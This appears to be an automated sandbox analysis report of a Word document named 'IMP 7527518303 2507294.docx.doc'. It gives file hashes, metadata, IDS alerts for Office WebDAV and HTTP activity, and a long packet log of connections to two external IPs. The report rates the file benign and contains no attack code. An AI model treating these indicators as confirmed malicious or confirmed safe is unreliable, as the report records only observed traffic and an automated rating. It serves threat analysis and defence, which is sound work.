Encrypted: false
SSDEEP: 3:ggPYV:rPYV
MD5: 187F488E27DB4AF347237FE461A079AD
SHA1: 6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256: 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512: 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious: false
Reputation: high, very likely benign file
Preview: [ZoneTransfer]....ZoneId=0
File type: Microsoft Word 2007+
Entropy (8bit): 7.99456518308567
TrID:
• Word Microsoft Office Open XML Format document (49504/1) 58.23%
• Word Microsoft Office Open XML Format document (27504/1) 32.35%
• ZIP compressed archive (8000/1) 9.41%
File name: IMP 7527518303 2507294.docx.doc
File size: 198'372 bytes
MD5: c8675988aa2bc47338861b4d62aa517d
SHA1: 67366589c5fbfa1153aa10a3d06b88d12719cdca
SHA256: 315b8754f30097fb04f76e09719a8415c53103a8c8abd6c7e988a918a2791476
SHA512: 9ba648f7362f74b44c0a752af1d8ff96859bf6da820e3e5503a51548e1864b17c3783aec66017ad29d9e632793a6613c386f84b03fc6fa14b00001ca74d775b2
SSDEEP: 3072:s3+eKSeRCX3Wp5STIrGvy3KJorM/+nKiTXcN7H4siQvIOKDS5QZV:s3peoX3WpYTvHqrM/jiTXgxvYeIV
TLSH: 6814227A523161D6CF6A05B11585CFAC5649402E28053AEBEF3067CFCCFBA7D5E79880
            File Content Preview:PK........BX.Z................[Content_Types].xmlUT...Y..gY..gY..g.VKk.@......^..v....9..1.4.....Z./v&...;k9..Tr.._$..{.c.]\..-^ .....j&..M...j.....".$....C-6..jy.i......=..#._........<G...".L+.U..V /f......SI.C,.wl ....Jt.......lC ...b:Q\..,]...5."6._.~'
Icon Hash: 35e1cc889a8a8599
Document Type: OpenXML
Number of OLE Files: 1
Has Summary Info:
Application Name:
Encrypted Document: False
Contains Word Document Stream: True
Contains Workbook/Book Stream: False
Contains PowerPoint Document Stream: False
Contains Visio Document Stream: False
Contains ObjectPool Stream: False
Flash Objects Count: 0
Contains VBA Macros: False


Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-04-02T12:00:40.599604+0200 | 1810005 | Joe Security ANOMALY Microsoft Office WebDAV Discovery | 1 | 192.168.2.24 | 60833 | 172.67.144.140 | 443 | TCP
2025-04-02T12:00:42.919911+0200 | 1810004 | Joe Security ANOMALY Microsoft Office HTTP activity | 1 | 192.168.2.24 | 60838 | 172.67.144.140 | 443 | TCP
2025-04-02T12:00:43.414685+0200 | 1810004 | Joe Security ANOMALY Microsoft Office HTTP activity | 1 | 192.168.2.24 | 60840 | 216.9.224.185 | 80 | TCP

• Total Packets: 131
• 443 (HTTPS)
• 80 (HTTP)
• 53 (DNS)
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 2, 2025 12:00:38.853153944 CEST | 60832 | 443 | 192.168.2.24 | 172.67.144.140
Apr 2, 2025 12:00:38.853197098 CEST | 443 | 60832 | 172.67.144.140 | 192.168.2.24
Apr 2, 2025 12:00:38.853286028 CEST | 60832 | 443 | 192.168.2.24 | 172.67.144.140
Apr 2, 2025 12:00:38.853828907 CEST | 60832 | 443 | 192.168.2.24 | 172.67.144.140
Apr 2, 2025 12:00:38.853838921 CEST | 443 | 60832 | 172.67.144.140 | 192.168.2.24
Apr 2, 2025 12:00:39.084008932 CEST | 443 | 60832 | 172.67.144.140 | 192.168.2.24
Apr 2, 2025 12:00:39.084631920 CEST | 60832 | 443 | 192.168.2.24 | 172.67.144.140
Apr 2, 2025 12:00:39.086549997 CEST | 60832 | 443 | 192.168.2.24 | 172.67.144.140
Apr 2, 2025 12:00:39.086561918 CEST | 443 | 60832 | 172.67.144.140 | 192.168.2.24
Apr 2, 2025 12:00:39.086813927 CEST | 443 | 60832 | 172.67.144.140 | 192.168.2.24
Apr 2, 2025 12:00:39.087825060 CEST | 60832 | 443 | 192.168.2.24 | 172.67.144.140
Apr 2, 2025 12:00:39.128278971 CEST | 443 | 60832 | 172.67.144.140 | 192.168.2.24
Apr 2, 2025 12:00:39.661459923 CEST | 443 | 60832 | 172.67.144.140 | 192.168.2.24
Apr 2, 2025 12:00:39.661554098 CEST | 443 | 60832 | 172.67.144.140 | 192.168.2.24
Apr 2, 2025 12:00:39.661628962 CEST | 60832 | 443 | 192.168.2.24 | 172.67.144.140
Apr 2, 2025 12:00:39.662909985 CEST | 60832 | 443 | 192.168.2.24 | 172.67.144.140
Apr 2, 2025 12:00:39.662931919 CEST | 443 | 60832 | 172.67.144.140 | 192.168.2.24
Apr 2, 2025 12:00:39.690762997 CEST | 60833 | 443 | 192.168.2.24 | 172.67.144.140
Apr 2, 2025 12:00:39.690800905 CEST | 443 | 60833 | 172.67.144.140 | 192.168.2.24
Apr 2, 2025 12:00:39.690880060 CEST | 60833 | 443 | 192.168.2.24 | 172.67.144.140
Apr 2, 2025 12:00:39.692805052 CEST | 60833 | 443 | 192.168.2.24 | 172.67.144.140
Apr 2, 2025 12:00:39.692812920 CEST | 443 | 60833 | 172.67.144.140 | 192.168.2.24
Apr 2, 2025 12:00:39.961561918 CEST | 443 | 60833 | 172.67.144.140 | 192.168.2.24
Apr 2, 2025 12:00:39.961777925 CEST | 60833 | 443 | 192.168.2.24 | 172.67.144.140
Apr 2, 2025 12:00:39.963179111 CEST | 60833 | 443 | 192.168.2.24 | 172.67.144.140
Apr 2, 2025 12:00:39.963185072 CEST | 443 | 60833 | 172.67.144.140 | 192.168.2.24
Apr 2, 2025 12:00:39.964215040 CEST | 443 | 60833 | 172.67.144.140 | 192.168.2.24
Apr 2, 2025 12:00:39.964334965 CEST | 60833 | 443 | 192.168.2.24 | 172.67.144.140
Apr 2, 2025 12:00:39.965614080 CEST | 60833 | 443 | 192.168.2.24 | 172.67.144.140
Apr 2, 2025 12:00:39.965671062 CEST | 443 | 60833 | 172.67.144.140 | 192.168.2.24
Apr 2, 2025 12:00:39.965732098 CEST | 60833 | 443 | 192.168.2.24 | 172.67.144.140
Apr 2, 2025 12:00:39.965735912 CEST | 443 | 60833 | 172.67.144.140 | 192.168.2.24
Apr 2, 2025 12:00:39.965779066 CEST | 60833 | 443 | 192.168.2.24 | 172.67.144.140
Apr 2, 2025 12:00:39.968780994 CEST | 60833 | 443 | 192.168.2.24 | 172.67.144.140
Apr 2, 2025 12:00:40.016274929 CEST | 443 | 60833 | 172.67.144.140 | 192.168.2.24
Apr 2, 2025 12:00:40.599621058 CEST | 443 | 60833 | 172.67.144.140 | 192.168.2.24
Apr 2, 2025 12:00:40.599719048 CEST | 60833 | 443 | 192.168.2.24 | 172.67.144.140
Apr 2, 2025 12:00:40.599731922 CEST | 443 | 60833 | 172.67.144.140 | 192.168.2.24
Apr 2, 2025 12:00:40.599772930 CEST | 443 | 60833 | 172.67.144.140 | 192.168.2.24
Apr 2, 2025 12:00:40.599783897 CEST | 60833 | 443 | 192.168.2.24 | 172.67.144.140
Apr 2, 2025 12:00:40.599814892 CEST | 60833 | 443 | 192.168.2.24 | 172.67.144.140
Apr 2, 2025 12:00:40.604208946 CEST | 60833 | 443 | 192.168.2.24 | 172.67.144.140
Apr 2, 2025 12:00:40.604227066 CEST | 443 | 60833 | 172.67.144.140 | 192.168.2.24
Apr 2, 2025 12:00:40.624747992 CEST | 60834 | 443 | 192.168.2.24 | 172.67.144.140
Apr 2, 2025 12:00:40.624802113 CEST | 443 | 60834 | 172.67.144.140 | 192.168.2.24
Apr 2, 2025 12:00:40.624939919 CEST | 60834 | 443 | 192.168.2.24 | 172.67.144.140
Apr 2, 2025 12:00:40.625432014 CEST | 60834 | 443 | 192.168.2.24 | 172.67.144.140
Apr 2, 2025 12:00:40.625442028 CEST | 443 | 60834 | 172.67.144.140 | 192.168.2.24
Apr 2, 2025 12:00:40.898474932 CEST | 443 | 60834 | 172.67.144.140 | 192.168.2.24
Apr 2, 2025 12:00:40.900243998 CEST | 60834 | 443 | 192.168.2.24 | 172.67.144.140
Apr 2, 2025 12:00:40.900306940 CEST | 443 | 60834 | 172.67.144.140 | 192.168.2.24
Apr 2, 2025 12:00:40.900712013 CEST | 60834 | 443 | 192.168.2.24 | 172.67.144.140
Apr 2, 2025 12:00:40.900727034 CEST | 443 | 60834 | 172.67.144.140 | 192.168.2.24
Apr 2, 2025 12:00:41.553364992 CEST | 443 | 60834 | 172.67.144.140 | 192.168.2.24
Apr 2, 2025 12:00:41.553443909 CEST | 443 | 60834 | 172.67.144.140 | 192.168.2.24
Apr 2, 2025 12:00:41.553508997 CEST | 60834 | 443 | 192.168.2.24 | 172.67.144.140
Apr 2, 2025 12:00:41.554408073 CEST | 60834 | 443 | 192.168.2.24 | 172.67.144.140
Apr 2, 2025 12:00:41.554408073 CEST | 60834 | 443 | 192.168.2.24 | 172.67.144.140
Apr 2, 2025 12:00:41.554454088 CEST | 443 | 60834 | 172.67.144.140 | 192.168.2.24
Apr 2, 2025 12:00:41.554486036 CEST | 443 | 60834 | 172.67.144.140 | 192.168.2.24
Apr 2, 2025 12:00:41.560941935 CEST | 60836 | 80 | 192.168.2.24 | 216.9.224.185
Apr 2, 2025 12:00:41.830055952 CEST | 80 | 60836 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:41.830141068 CEST | 60836 | 80 | 192.168.2.24 | 216.9.224.185
Apr 2, 2025 12:00:41.830538034 CEST | 60836 | 80 | 192.168.2.24 | 216.9.224.185
Apr 2, 2025 12:00:42.086951971 CEST | 80 | 60836 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:42.136091948 CEST | 60836 | 80 | 192.168.2.24 | 216.9.224.185
Apr 2, 2025 12:00:42.155586004 CEST | 60838 | 443 | 192.168.2.24 | 172.67.144.140
Apr 2, 2025 12:00:42.155602932 CEST | 443 | 60838 | 172.67.144.140 | 192.168.2.24
Apr 2, 2025 12:00:42.155658007 CEST | 60838 | 443 | 192.168.2.24 | 172.67.144.140
Apr 2, 2025 12:00:42.157167912 CEST | 60838 | 443 | 192.168.2.24 | 172.67.144.140
Apr 2, 2025 12:00:42.157177925 CEST | 443 | 60838 | 172.67.144.140 | 192.168.2.24
Apr 2, 2025 12:00:42.356759071 CEST | 443 | 60838 | 172.67.144.140 | 192.168.2.24
Apr 2, 2025 12:00:42.356863976 CEST | 60838 | 443 | 192.168.2.24 | 172.67.144.140
Apr 2, 2025 12:00:42.358457088 CEST | 60838 | 443 | 192.168.2.24 | 172.67.144.140
Apr 2, 2025 12:00:42.358469009 CEST | 443 | 60838 | 172.67.144.140 | 192.168.2.24
Apr 2, 2025 12:00:42.358800888 CEST | 443 | 60838 | 172.67.144.140 | 192.168.2.24
Apr 2, 2025 12:00:42.358853102 CEST | 60838 | 443 | 192.168.2.24 | 172.67.144.140
Apr 2, 2025 12:00:42.359623909 CEST | 60838 | 443 | 192.168.2.24 | 172.67.144.140
Apr 2, 2025 12:00:42.359687090 CEST | 443 | 60838 | 172.67.144.140 | 192.168.2.24
Apr 2, 2025 12:00:42.359736919 CEST | 60838 | 443 | 192.168.2.24 | 172.67.144.140
Apr 2, 2025 12:00:42.359854937 CEST | 60838 | 443 | 192.168.2.24 | 172.67.144.140
Apr 2, 2025 12:00:42.400274992 CEST | 443 | 60838 | 172.67.144.140 | 192.168.2.24
Apr 2, 2025 12:00:42.919908047 CEST | 443 | 60838 | 172.67.144.140 | 192.168.2.24
Apr 2, 2025 12:00:42.920037985 CEST | 443 | 60838 | 172.67.144.140 | 192.168.2.24
Apr 2, 2025 12:00:42.920106888 CEST | 60838 | 443 | 192.168.2.24 | 172.67.144.140
Apr 2, 2025 12:00:42.921897888 CEST | 60838 | 443 | 192.168.2.24 | 172.67.144.140
Apr 2, 2025 12:00:42.921916962 CEST | 443 | 60838 | 172.67.144.140 | 192.168.2.24
Apr 2, 2025 12:00:42.923511028 CEST | 60840 | 80 | 192.168.2.24 | 216.9.224.185
Apr 2, 2025 12:00:43.166501045 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.166635036 CEST | 60840 | 80 | 192.168.2.24 | 216.9.224.185
Apr 2, 2025 12:00:43.166783094 CEST | 60840 | 80 | 192.168.2.24 | 216.9.224.185
Apr 2, 2025 12:00:43.414607048 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.414628983 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.414644003 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.414659023 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.414673090 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.414685011 CEST | 60840 | 80 | 192.168.2.24 | 216.9.224.185
Apr 2, 2025 12:00:43.414689064 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.414704084 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.414717913 CEST | 60840 | 80 | 192.168.2.24 | 216.9.224.185
Apr 2, 2025 12:00:43.414721012 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.414735079 CEST | 60840 | 80 | 192.168.2.24 | 216.9.224.185
Apr 2, 2025 12:00:43.414736986 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.414753914 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.414767981 CEST | 60840 | 80 | 192.168.2.24 | 216.9.224.185
Apr 2, 2025 12:00:43.414792061 CEST | 60840 | 80 | 192.168.2.24 | 216.9.224.185
Apr 2, 2025 12:00:43.664691925 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.664756060 CEST | 60840 | 80 | 192.168.2.24 | 216.9.224.185
Apr 2, 2025 12:00:43.665791988 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.665808916 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.665827990 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.665834904 CEST | 60840 | 80 | 192.168.2.24 | 216.9.224.185
Apr 2, 2025 12:00:43.665844917 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.665859938 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.665859938 CEST | 60840 | 80 | 192.168.2.24 | 216.9.224.185
Apr 2, 2025 12:00:43.665868044 CEST | 60840 | 80 | 192.168.2.24 | 216.9.224.185
Apr 2, 2025 12:00:43.665889025 CEST | 60840 | 80 | 192.168.2.24 | 216.9.224.185
Apr 2, 2025 12:00:43.665909052 CEST | 60840 | 80 | 192.168.2.24 | 216.9.224.185
Apr 2, 2025 12:00:43.665936947 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.665951967 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.665960073 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.665982962 CEST | 60840 | 80 | 192.168.2.24 | 216.9.224.185
Apr 2, 2025 12:00:43.665988922 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.666012049 CEST | 60840 | 80 | 192.168.2.24 | 216.9.224.185
Apr 2, 2025 12:00:43.666017056 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.666044950 CEST | 60840 | 80 | 192.168.2.24 | 216.9.224.185
Apr 2, 2025 12:00:43.666050911 CEST | 60840 | 80 | 192.168.2.24 | 216.9.224.185
Apr 2, 2025 12:00:43.666085005 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.666100979 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.666115046 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.666125059 CEST | 60840 | 80 | 192.168.2.24 | 216.9.224.185
Apr 2, 2025 12:00:43.666141033 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.666151047 CEST | 60840 | 80 | 192.168.2.24 | 216.9.224.185
Apr 2, 2025 12:00:43.666158915 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.666182995 CEST | 60840 | 80 | 192.168.2.24 | 216.9.224.185
Apr 2, 2025 12:00:43.666182995 CEST | 60840 | 80 | 192.168.2.24 | 216.9.224.185
Apr 2, 2025 12:00:43.666202068 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.666208029 CEST | 60840 | 80 | 192.168.2.24 | 216.9.224.185
Apr 2, 2025 12:00:43.666218042 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.666243076 CEST | 60840 | 80 | 192.168.2.24 | 216.9.224.185
Apr 2, 2025 12:00:43.666255951 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.666260004 CEST | 60840 | 80 | 192.168.2.24 | 216.9.224.185
Apr 2, 2025 12:00:43.666273117 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.666296959 CEST | 60840 | 80 | 192.168.2.24 | 216.9.224.185
Apr 2, 2025 12:00:43.666313887 CEST | 60840 | 80 | 192.168.2.24 | 216.9.224.185
Apr 2, 2025 12:00:43.904383898 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.904405117 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.904510021 CEST | 60840 | 80 | 192.168.2.24 | 216.9.224.185
Apr 2, 2025 12:00:43.908724070 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.908740997 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.908757925 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.908766985 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.908835888 CEST | 60840 | 80 | 192.168.2.24 | 216.9.224.185
Apr 2, 2025 12:00:43.908881903 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.908896923 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.908910990 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.908922911 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.908934116 CEST | 60840 | 80 | 192.168.2.24 | 216.9.224.185
Apr 2, 2025 12:00:43.908940077 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.908946991 CEST | 60840 | 80 | 192.168.2.24 | 216.9.224.185
Apr 2, 2025 12:00:43.908955097 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.908967972 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.908974886 CEST | 60840 | 80 | 192.168.2.24 | 216.9.224.185
Apr 2, 2025 12:00:43.908982038 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.908997059 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.909003019 CEST | 60840 | 80 | 192.168.2.24 | 216.9.224.185
Apr 2, 2025 12:00:43.909013033 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.909020901 CEST | 60840 | 80 | 192.168.2.24 | 216.9.224.185
Apr 2, 2025 12:00:43.909043074 CEST | 60840 | 80 | 192.168.2.24 | 216.9.224.185
Apr 2, 2025 12:00:43.909046888 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.909061909 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.909075975 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.909080029 CEST | 60840 | 80 | 192.168.2.24 | 216.9.224.185
Apr 2, 2025 12:00:43.909091949 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.909105062 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.909107924 CEST | 60840 | 80 | 192.168.2.24 | 216.9.224.185
Apr 2, 2025 12:00:43.909118891 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.909132957 CEST | 60840 | 80 | 192.168.2.24 | 216.9.224.185
Apr 2, 2025 12:00:43.909132957 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.909149885 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.909152031 CEST | 60840 | 80 | 192.168.2.24 | 216.9.224.185
Apr 2, 2025 12:00:43.909176111 CEST | 60840 | 80 | 192.168.2.24 | 216.9.224.185
Apr 2, 2025 12:00:43.909199953 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.909214020 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.909245014 CEST | 60840 | 80 | 192.168.2.24 | 216.9.224.185
Apr 2, 2025 12:00:43.909293890 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.909306049 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.909318924 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.909322977 CEST | 60840 | 80 | 192.168.2.24 | 216.9.224.185
Apr 2, 2025 12:00:43.909332991 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.909348965 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.909363985 CEST | 60840 | 80 | 192.168.2.24 | 216.9.224.185
Apr 2, 2025 12:00:43.909389973 CEST | 60840 | 80 | 192.168.2.24 | 216.9.224.185
Apr 2, 2025 12:00:43.909905910 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.909985065 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.909998894 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.910012007 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.910021067 CEST | 60840 | 80 | 192.168.2.24 | 216.9.224.185
Apr 2, 2025 12:00:43.910037041 CEST | 60840 | 80 | 192.168.2.24 | 216.9.224.185
Apr 2, 2025 12:00:43.910121918 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.910135031 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.910154104 CEST | 60840 | 80 | 192.168.2.24 | 216.9.224.185
Apr 2, 2025 12:00:43.910176992 CEST | 60840 | 80 | 192.168.2.24 | 216.9.224.185
Apr 2, 2025 12:00:43.910192966 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.910206079 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.910213947 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:43.910249949 CEST | 60840 | 80 | 192.168.2.24 | 216.9.224.185
Apr 2, 2025 12:00:44.154470921 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:44.154526949 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:44.154527903 CEST | 60840 | 80 | 192.168.2.24 | 216.9.224.185
Apr 2, 2025 12:00:44.154542923 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:44.154562950 CEST | 60840 | 80 | 192.168.2.24 | 216.9.224.185
Apr 2, 2025 12:00:44.154597998 CEST | 60840 | 80 | 192.168.2.24 | 216.9.224.185
Apr 2, 2025 12:00:44.179574013 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:44.179590940 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:44.179604053 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:44.179619074 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:44.179629087 CEST | 60840 | 80 | 192.168.2.24 | 216.9.224.185
Apr 2, 2025 12:00:44.179666042 CEST | 60840 | 80 | 192.168.2.24 | 216.9.224.185
Apr 2, 2025 12:00:44.179743052 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:44.179755926 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:44.179769993 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:44.179779053 CEST | 60840 | 80 | 192.168.2.24 | 216.9.224.185
Apr 2, 2025 12:00:44.179811001 CEST | 60840 | 80 | 192.168.2.24 | 216.9.224.185
Apr 2, 2025 12:00:44.179925919 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:44.179943085 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:44.179958105 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:44.179960966 CEST | 60840 | 80 | 192.168.2.24 | 216.9.224.185
Apr 2, 2025 12:00:44.179975986 CEST | 60840 | 80 | 192.168.2.24 | 216.9.224.185
Apr 2, 2025 12:00:44.179996014 CEST | 60840 | 80 | 192.168.2.24 | 216.9.224.185
Apr 2, 2025 12:00:44.410861015 CEST | 80 | 60840 | 216.9.224.185 | 192.168.2.24
Apr 2, 2025 12:00:44.410932064 CEST | 60840 | 80 | 192.168.2.24 | 216.9.224.185
Apr 2, 2025 12:00:44.505847931 CEST | 60843 | 443 | 192.168.2.24 | 172.67.144.140
Apr 2, 2025 12:00:44.505896091 CEST | 443 | 60843 | 172.67.144.140 | 192.168.2.24
Apr 2, 2025 12:00:44.506872892 CEST | 60843 | 443 | 192.168.2.24 | 172.67.144.140
Apr 2, 2025 12:00:44.508217096 CEST | 60843 | 443 | 192.168.2.24 | 172.67.144.140
Apr 2, 2025 12:00:44.508246899 CEST | 443 | 60843 | 172.67.144.140 | 192.168.2.24
Apr 2, 2025 12:00:44.712158918 CEST | 443 | 60843 | 172.67.144.140 | 192.168.2.24
Apr 2, 2025 12:00:44.712248087 CEST | 60843 | 443 | 192.168.2.24 | 172.67.144.140
Apr 2, 2025 12:00:44.778906107 CEST | 60843 | 443 | 192.168.2.24 | 172.67.144.140
Apr 2, 2025 12:00:44.778927088 CEST | 443 | 60843 | 172.67.144.140 | 192.168.2.24
Apr 2, 2025 12:00:44.779588938 CEST | 443 | 60843 | 172.67.144.140 | 192.168.2.24
            Apr 2, 2025 12:00:44.779673100 CEST60843443192.168.2.24172.67.144.140
            Apr 2, 2025 12:00:44.785413980 CEST60843443192.168.2.24172.67.144.140
            Apr 2, 2025 12:00:44.785413980 CEST60843443192.168.2.24172.67.144.140
            Apr 2, 2025 12:00:44.785531044 CEST44360843172.67.144.140192.168.2.24
            Apr 2, 2025 12:00:44.785634995 CEST60843443192.168.2.24172.67.144.140
            Apr 2, 2025 12:00:45.303451061 CEST44360843172.67.144.140192.168.2.24
            Apr 2, 2025 12:00:45.303525925 CEST44360843172.67.144.140192.168.2.24
            Apr 2, 2025 12:00:45.303694963 CEST60843443192.168.2.24172.67.144.140
            Apr 2, 2025 12:00:45.303694963 CEST60843443192.168.2.24172.67.144.140
            Apr 2, 2025 12:00:45.303694963 CEST60843443192.168.2.24172.67.144.140
            Apr 2, 2025 12:00:45.305079937 CEST6084080192.168.2.24216.9.224.185
            Apr 2, 2025 12:00:45.576210976 CEST8060840216.9.224.185192.168.2.24
            Apr 2, 2025 12:00:45.576308012 CEST6084080192.168.2.24216.9.224.185
            Apr 2, 2025 12:00:45.605353117 CEST60843443192.168.2.24172.67.144.140
            Apr 2, 2025 12:00:45.605386972 CEST44360843172.67.144.140192.168.2.24
            Apr 2, 2025 12:00:47.109486103 CEST8060836216.9.224.185192.168.2.24
            Apr 2, 2025 12:00:47.109601021 CEST6083680192.168.2.24216.9.224.185
            Apr 2, 2025 12:00:47.111859083 CEST6083680192.168.2.24216.9.224.185
            Apr 2, 2025 12:00:47.377196074 CEST8060836216.9.224.185192.168.2.24
            Apr 2, 2025 12:00:50.606215954 CEST8060840216.9.224.185192.168.2.24
            Apr 2, 2025 12:00:50.606306076 CEST6084080192.168.2.24216.9.224.185
            Apr 2, 2025 12:02:26.088608027 CEST6084080192.168.2.24216.9.224.185
